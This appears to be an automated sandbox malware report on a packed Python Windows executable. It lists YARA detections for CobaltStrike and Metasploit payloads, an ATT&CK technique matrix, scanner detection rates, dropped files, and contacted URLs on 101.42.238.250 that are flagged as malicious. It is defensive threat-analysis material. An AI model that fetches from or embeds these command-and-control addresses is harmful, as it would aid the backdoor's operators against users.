        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pyd VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\pyexpat.pyd VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299C080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF60299C080
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B4A80 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6029B4A80
        Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

        Remote Access Functionality

        barindex
        Yara detected CobaltStrike
        Source: Yara matchFile source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Yara detected Metasploit Payload
        Source: Yara matchFile source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Windows Management Instrumentation        		1
        DLL Side-Loading        		11
        Process Injection        		2
        Virtualization/Sandbox Evasion        		OS Credential Dumping2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		22
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		11
        Process Injection        		LSASS Memory41
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information        		Security Account Manager2
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information        		NTDS2
        File and Directory Discovery        		Distributed Component Object ModelInput Capture112
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Timestomp        		LSA Secrets33
        System Information Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        DChOtFdp9T.exe64%VirustotalBrowse
        DChOtFdp9T.exe45%ReversingLabsWin64.Backdoor.Cobeacon

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD2.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD4.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD5.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA1.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA224.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA256.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA384.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA512.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_keccak.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_poly1305.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Math\_modexp.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve25519.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve448.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_strxor.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140_1.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_asyncio.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_cffi_backend.cp312-win_amd64.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_decimal.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_hashlib.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_multiprocessing.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_queue.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_socket.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_ssl.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\_wmi.pyd0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://01.42.238.250:443/Ye3l0%Avira URL Cloudsafe
        http://101.42.238.250/b.txt0%Avira URL Cloudsafe
        http://httpbin.org/0%Avira URL Cloudsafe
        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warningsThe0%Avira URL Cloudsafe
        https://setuptools.pypa.io/en/latest/0%Avira URL Cloudsafe
        http://101.42.238.250:443/Ye3l2G7cghlI0%Avira URL Cloudsafe
        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings0%Avira URL Cloudsafe
        http://ocsp.digicert0%Avira URL Cloudsafe
        http://101.42.238.250/b.txtng.utils0%Avira URL Cloudsafe
        http://101.42.238.250:443/Ye3l0%Avira URL Cloudsafe
        http://101.42.238.250/a.txt0%Avira URL Cloudsafe
        https://101.42.238.250:443/Ye3l0%Avira URL Cloudsafe
        https://w3c.github.io/html/sec-forms.html#multipart-form-data0%Avira URL Cloudsafe
        https://peps.python.org/pep-0685/0%Avira URL Cloudsafe
        https://requests.readthedocs.ioe0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://01.42.238.250:443/Ye3ltrue
        • Avira URL Cloud: safe
        		unknown
        http://101.42.238.250/b.txttrue
        • Avira URL Cloud: safe
        		unknown
        http://101.42.238.250/a.txttrue
        • Avira URL Cloud: safe
        		unknown
        https://101.42.238.250:443/Ye3ltrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdfDChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesDChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://aka.ms/vcpython27DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714174593.000001780A559000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://cloud.google.com/appengine/docs/standard/runtimesDChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://docs.python.org/library/unittest.htmlDChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A4A5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A49E000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714174593.000001780A4A5000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://setuptools.pypa.io/en/latest/DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/pyca/cryptography/actions?query=workflow%3ACIDChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                      		high
                      https://tools.ietf.org/html/rfc2388#section-4.4DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.apache.org/licenses/LICENSE-2.0DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CE3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1690447579.00000260D1CE4000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drfalse
                          		high
                          https://packaging.python.org/en/latest/specifications/core-metadata/DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A356000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/openssl/openssl/blob/master/include/openssl/pem.hDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A616000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/pypa/packagingDChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://ocsp.digicertDChOtFdp9T.exe, 00000000.00000003.1696576885.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://refspecs.linuxfoundation.org/elf/gabi4DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://docs.python.org/3/library/subprocess#subprocess.Popen.killDChOtFdp9T.exe, 00000001.00000002.1873753022.000001780ADB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://tools.ietf.org/html/rfc3610DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/platformdirs/platformdirsDChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://peps.python.org/pep-0205/DChOtFdp9T.exe, 00000001.00000002.1872868299.000001780A150000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                            		high
                                            http://curl.haxx.se/rfc/cookie_spec.htmlDChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodeDChOtFdp9T.exe, 00000001.00000002.1873753022.000001780ADB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688DChOtFdp9T.exe, 00000001.00000002.1872392888.0000017809A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://httpbin.org/getDChOtFdp9T.exe, 00000001.00000002.1874370740.000001780BA50000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://httpbin.org/DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B6D000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://packaging.python.org/en/latest/specifications/entry-points/DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
